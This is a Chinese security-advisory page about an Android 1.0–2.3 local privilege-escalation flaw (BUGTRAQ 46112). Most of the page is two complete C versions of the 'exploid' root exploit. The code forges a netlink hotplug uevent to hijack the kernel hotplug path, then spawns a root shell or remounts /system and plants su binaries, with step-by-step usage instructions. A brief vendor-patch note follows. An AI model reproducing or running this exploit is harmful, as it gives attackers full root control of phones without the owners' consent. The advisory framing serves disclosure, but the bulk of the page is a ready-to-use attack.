首页 / 操作系统 / Linux / Open Handset Alliance Android本地权限提升漏洞
发布日期:2011-02-04 更新日期:2011-02-04受影响系统: Open Handset Alliance Open Handset Alliance Android 1.0 - 2.3 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 46112Android是Google通过Open Handset Alliance发起的项目,用于为移动设备提供完整的软件集,包括操作系统、中间件等。Open Handset Alliance Android在实现上存在本地权限提升漏洞,本地攻击者可利用此漏洞提升权限,从而完全控制设备。 <*来源:The Android Exploid Crew *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!The Android Exploid Crew ()提供了如下测试方法:/* android 1.x/2.x the real youdev feat. init local root exploit. * * * Modifications to original exploit for HTC Wildfire Stage 1 soft-root (c) 2010 Martin Paul Eve * Changes: * -- Will not remount /system rw (NAND protection renders this pointless) * -- Doesn"t copy self, merely chmods permissions of original executable * -- No password required for rootshell (designed to be immediately removed once su binary is in place) * * Revised usage instructions: * -- Copy to /sqlite_stmt_journals/exploid and /sqlite_stmt_journals/su * -- chmod exploid to 755 * -- Execute the binary * -- Enable or disable a hotplug item (wifi, bluetooth etc. -- this could be done automatically by an app that packaged this exploit) -- don"t worry that it segfaults * -- Execute it again to gain rootshell * -- Copy to device (/sqlite_stmt_journals/) + chown/chmod su to 04711 * -- Delete original exploid * -- Use modified Superuser app with misplaced su binary * * Explanatory notes: * -- This is designed to be used with a modified superuser app (not yet written) which will use the su binary in /sqlite_stmt_journals/ * -- It is important that you delete the original exploid binary because, otherwise, any application can gain root * * Original copyright/usage information * * (C) 2009/2010 by The Android Exploid Crew. * * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run. * Or use /data/local/tmp if available (thx to ioerror!) It is important to * to use /sqlite_stmt_journals directory if available. * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc} * or use USB keys etc. This will invoke hotplug which is actually * our exploit making /system/bin/rootshell. * This exploit requires /etc/firmware directory, e.g. it will * run on real devices and not inside the emulator. * I"d like to have this exploitet by using the same blockdevice trick * as in udev, but internal structures only allow world writable char * devices, not block devices, so I used the firmware subsystem. * * !!!This is PoC code for educational purposes only!!! * If you run it, it might crash your device and make it unusable! * So you use it at your own risk! * * Thx to all the TAEC supporters. * */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <linux/netlink.h> #include <fcntl.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <signal.h> #include <sys/mount.h>void die(const char *msg) { perror(msg); exit(errno); }void clear_hotplug() { int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC); write(ofd, "", 1); close(ofd); }void rootshell(char **env) { char pwd[128]; char *sh[] = {"/system/bin/sh", 0}; setuid(0); setgid(0); execve(*sh, sh, env); die("[-] execve"); } int main(int argc, char **argv, char **env) { char buf[512], path[512]; int ofd; struct sockaddr_nl snl; struct iovec iov = {buf, sizeof(buf)}; struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0}; int sock; char *basedir = NULL, *logmessage; /* I hope there is no LD_ bug in androids rtld :) */ if (geteuid() == 0 && getuid() != 0) rootshell(env); if (readlink("/proc/self/exe", path, sizeof(path)) < 0) die("[-] readlink"); if (geteuid() == 0) { clear_hotplug();
chown(path, 0, 0); chmod(path, 04711);
chown("/sqlite_stmt_journals/su", 0, 0); chmod("/sqlite_stmt_journals/su", 06755); return 0; } printf("[*] Android local root exploid (C) The Android Exploid Crew
"); printf("[*] Modified by Martin Paul Eve for Wildfire Stage 1 soft-root
"); basedir = "/sqlite_stmt_journals"; if (chdir(basedir) < 0) { basedir = "/data/local/tmp"; if (chdir(basedir) < 0) basedir = strdup(getcwd(buf, sizeof(buf))); } printf("[+] Using basedir=%s, path=%s
", basedir, path); printf("[+] opening NETLINK_KOBJECT_UEVENT socket
"); memset(&snl, 0, sizeof(snl)); snl.nl_pid = 1; snl.nl_family = AF_NETLINK; if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0) die("[-] socket"); close(creat("loading", 0666)); if ((ofd = creat("hotplug", 0644)) < 0) die("[-] creat"); if (write(ofd, path , strlen(path)) < 0) die("[-] write"); close(ofd); symlink("/proc/sys/kernel/hotplug", "data"); snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c" "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0); printf("[+] sending add message ...
"); if (sendmsg(sock, &msg, 0) < 0) die("[-] sendmsg"); close(sock); printf("[*] Try to invoke hotplug now, clicking at the wireless
" "[*] settings, plugin USB key etc.
" "[*] You succeeded if you find /system/bin/rootshell.
" "[*] GUI might hang/restart meanwhile so be patient.
"); return 0; } /* android 1.x/2.x the real youdev feat. init local root exploit. * (C) 2009/2010 by The Android Exploid Crew. * * Copy from sdcard to /sqlite_stmt_journals/exploid, chmod 0755 and run. * Or use /data/local/tmp if available (thx to ioerror!) It is important to * to use /sqlite_stmt_journals directory if available. * Then try to invoke hotplug by clicking Settings->Wireless->{Airplane,WiFi etc} * or use USB keys etc. This will invoke hotplug which is actually * our exploit making /system/bin/rootshell. * This exploit requires /etc/firmware directory, e.g. it will * run on real devices and not inside the emulator. * I"d like to have this exploitet by using the same blockdevice trick * as in udev, but internal structures only allow world writable char * devices, not block devices, so I used the firmware subsystem. * * !!!This is PoC code for educational purposes only!!! * If you run it, it might crash your device and make it unusable! * So you use it at your own risk! * * Thx to all the TAEC supporters. */ #include <stdio.h> #include <sys/socket.h> #include <sys/types.h> #include <linux/netlink.h> #include <fcntl.h> #include <errno.h> #include <stdlib.h> #include <string.h> #include <string.h> #include <unistd.h> #include <sys/stat.h> #include <signal.h> #include <sys/mount.h> #define SECRET "secretlol" void die(const char *msg) { perror(msg); exit(errno); } void copy(const char *from, const char *to) { int fd1, fd2; char buf[0x1000]; ssize_t r = 0;if ((fd1 = open(from, O_RDONLY)) < 0) die("[-] open"); if ((fd2 = open(to, O_RDWR|O_CREAT|O_TRUNC, 0600)) < 0) die("[-] open"); for (;;) { r = read(fd1, buf, sizeof(buf)); if (r < 0) die("[-] read"); if (r == 0) break; if (write(fd2, buf, r) != r) die("[-] write"); }close(fd1); close(fd2); sync(); sync(); } void clear_hotplug() { int ofd = open("/proc/sys/kernel/hotplug", O_WRONLY|O_TRUNC); write(ofd, "", 1); close(ofd); } int main(int argc, char **argv, char **env) { char buf[512], path[512]; int ofd; struct sockaddr_nl snl; struct iovec iov = {buf, sizeof(buf)}; struct msghdr msg = {&snl, sizeof(snl), &iov, 1, NULL, 0, 0}; int sock; char *basedir = NULL; /* I hope there is no LD_ bug in androids rtld :) */ /*if (geteuid() == 0 && getuid() != 0) rootshell(env);*/if (readlink("/proc/self/exe", path, sizeof(path)) < 0) die("[-] readlink");if (geteuid() == 0) { clear_hotplug(); /* remount /system rw */ //DROID 1 and Ally //mount("/dev/block/mtdblock4", "/system", "yaffs2", MS_REMOUNT, 0); //DROID X //mount("/dev/block/mmcblk1p21", "/system", "ext3", MS_REMOUNT, 0); //GALAXY S mount("/dev/block/stl9","/system", "rfs", MS_REMOUNT, 0); //Eris and HTC Hero //mount("/dev/block/mtdblock3", "/system", "yaffs2", MS_REMOUNT, 0); //copy("/sdcard/su","/system/bin/su"); //copy("/sdcard/Superuser.apk","/system/app/Superuser.apk"); copy("/data/data/com.unstableapps.easyroot/files/su","/system/bin/su"); copy("/data/data/com.unstableapps.easyroot/files/Superuser.apk","/system/app/Superuser.apk"); chmod("/system/bin/su", 04755); chmod("/system/app/Superuser.apk", 04744);for (;;); }//basedir = "/sqlite_stmt_journals"; basedir = "/data/data/com.unstableapps.easyroot/files"; if (chdir(basedir) < 0) { basedir = "/data/local/tmp"; if (chdir(basedir) < 0) basedir = strdup(getcwd(buf, sizeof(buf))); }memset(&snl, 0, sizeof(snl)); snl.nl_pid = 1; snl.nl_family = AF_NETLINK;if ((sock = socket(PF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT)) < 0) die("[-] socket");close(creat("loading", 0666)); if ((ofd = creat("hotplug", 0644)) < 0) die("[-] creat"); if (write(ofd, path , strlen(path)) < 0) die("[-] write"); close(ofd); symlink("/proc/sys/kernel/hotplug", "data"); snprintf(buf, sizeof(buf), "ACTION=add%cDEVPATH=/..%s%c" "SUBSYSTEM=firmware%c" "FIRMWARE=../../..%s/hotplug%c", 0, basedir, 0, 0, basedir, 0); printf("[+] sending add message ...
"); if (sendmsg(sock, &msg, 0) < 0) die("[-] sendmsg"); close(sock); sleep(3); return 0; }建议: -------------------------------------------------------------------------------- 厂商补丁:Open Handset Alliance --------------------- 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.openhandsetalliance.com/android_overview.htmlGoogle Chrome 9.0.597.84之前版本多个安全漏洞Tomcat 报本地文件安全管理器漏洞相关资讯 漏洞
快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
要389目录服务器访问绕过漏洞 (10/01/2012 09:18:08)
ASUS Net4Switch "ipswcom.dll" (03/02/2012 09:32:42)
软件漏洞是一笔大买卖! (10/06/2012 08:28:32)
PHPCMS V9.1.13任意文件包含漏洞分 (08/01/2012 07:23:17)
Open Handset Alliance Android (03/01/2012 06:59:34)
易网时代-编程资源站